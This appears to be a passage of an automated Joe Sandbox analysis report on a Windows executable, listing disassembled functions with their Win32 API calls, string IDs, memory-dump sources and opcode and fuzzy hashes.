                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePost$CtrlFocus
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1534620443-4108050209
                                                                                                                    • Opcode ID: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                                    • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                                                                    • Opcode Fuzzy Hash: d1db05db4fd2a56646a253bb82972057caa917eb73d061b61dca20a17b51d953
                                                                                                                    • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                                                                    Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(?), ref: 004558E3
                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CreateDestroy
                                                                                                                    • String ID: ,$tooltips_class32
                                                                                                                    • API String ID: 1109047481-3856767331
                                                                                                                    • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                    • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                                    • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                    • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                                    Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                                    • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                                    • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                                    • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                                    • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                                    • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                                    • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                                    • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                                    • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                                    • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1441871840-4108050209
                                                                                                                    • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                                    • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                                    • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                                    • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                                    Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                    • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                    • __swprintf.LIBCMT ref: 00460915
                                                                                                                    • __swprintf.LIBCMT ref: 0046092D
                                                                                                                    • _wprintf.LIBCMT ref: 004609E1
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                    • API String ID: 3631882475-2268648507
                                                                                                                    • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                    • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                                    • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                    • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                                    Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                                                                    • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                                                                    • SendMessageW.USER32 ref: 00471740
                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                                                                    • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                                                                    • SendMessageW.USER32 ref: 0047184F
                                                                                                                    • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                                                                    • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                                                                    • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4116747274-0
                                                                                                                    • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                    • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                                    • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                    • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                                    Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                                    • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                                    • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoItemMenu$Sleep
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1196289194-4108050209
                                                                                                                    • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                                    • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                                    • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                                    • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                                    Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 0043143E
                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                                    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 3300687185-3887548279
                                                                                                                    • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                                    • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                                    • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                                    • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                                    Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                    • API String ID: 1976180769-4113822522
                                                                                                                    • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                    • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                                    • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                    • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                                    Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 461458858-0
                                                                                                                    • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                    • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                                    • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                    • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                                    Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                                                                    • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                                                                    • DeleteObject.GDI32(?), ref: 004301D0
                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3969911579-0
                                                                                                                    • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                    • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                                                                    • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                                                                    • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                                                                    Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 956284711-4108050209
                                                                                                                    • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                    • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                                                                    • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                                                                    • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                                                                    Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                    • String ID: 0.0.0.0
                                                                                                                    • API String ID: 1965227024-3771769585
                                                                                                                    • Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
                                                                                                                    • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                                                                    • Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
